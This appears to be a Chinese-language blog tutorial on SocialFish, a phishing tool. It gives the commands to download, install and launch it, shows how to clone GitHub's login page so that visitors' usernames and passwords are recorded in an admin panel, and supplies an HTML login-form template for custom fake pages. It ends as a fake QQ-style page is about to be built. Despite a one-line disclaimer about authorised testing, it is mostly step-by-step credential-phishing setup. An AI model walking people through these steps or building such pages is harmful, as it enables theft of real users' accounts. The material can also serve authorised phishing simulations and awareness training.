一款设计美观、功能强大的钓鱼工具——SoicalFish

声明

以下教程仅限用于授权渗透测试，请勿用于非法用途

效果展示

使用方法

下载相关代码

下载SocialFish的Git代码

git clone https://github.com/UndeadSec/SocialFish.git

然后打开SocialFish目录

cd SocialFish

如果没有Python环境则需要进行安装（下面是以Ubuntu、Debian内核为例的，CentOS则需要使用yum命令）

sudo apt-get install python3 python3-pip python3-dev -y

安装依赖

python3 -m pip install -r requirements.txt

启动程序&访问后台

然后我们使用下面的命令启动程序

• 账户为fancypig
• 密码为123456

您可以自行输入命令时进行修改

python3 SocialFish.py fancypig 123456

通过上图，我们可以看到程序已经正常运转，并且在5000端口，由于我这里是内网搭建的，我们可以通过内网的IP地址进行访问

然后我们就进入了后台

克隆站点

接下来我们需要对目标站点的登陆页面进行克隆，譬如github的登陆页面，

我们则在第一个Clone框内输入www.github.com/login

第二个是登录成功之后跳转的地址，我们随便输入，比方说是百度www.baidu.com，然后点击⚡

这时会提示生成成功，我们直接访问IP:5000端口

这里可以看到居然github的页面已经被转到本地了，我们这时输入账户、密码

我这里随便进行输入

• fancypignb
• guessmypassword

然后我们查看后台里的报表，可以发现有成功的一条了，并且显示了操作系统及用户使用的浏览器，我们如果想查看更多的信息，可以点击🔍View

然后我们会发现登录的账户及密码都被完整的记录下来了！是不是还挺神奇的呢！

自定义模板

很多网友可能会吐槽，这个克隆站点仅限于部分站点可以使用，很多克隆出来CSS样式等等都加载不了，那这时候应该怎么办呢？没关系，还有自定义HTML

核心代码格式如下

<html>
<head></head>
<body>
	<form action="/login" method="POST">
	    <label>Email Address</label>
	    <input type="email" name="email" placeholder="Email" autocomplete="off">
	    <label>Password</label>
	    <input type="password" name="password" placeholder="Password" autocomplete="off">
		<button type="submit">sign in</button>                                
	</form>
</body>
</html>

我们这里举个简单的例子，比方说我们想要仿个简单的某Q的登陆页面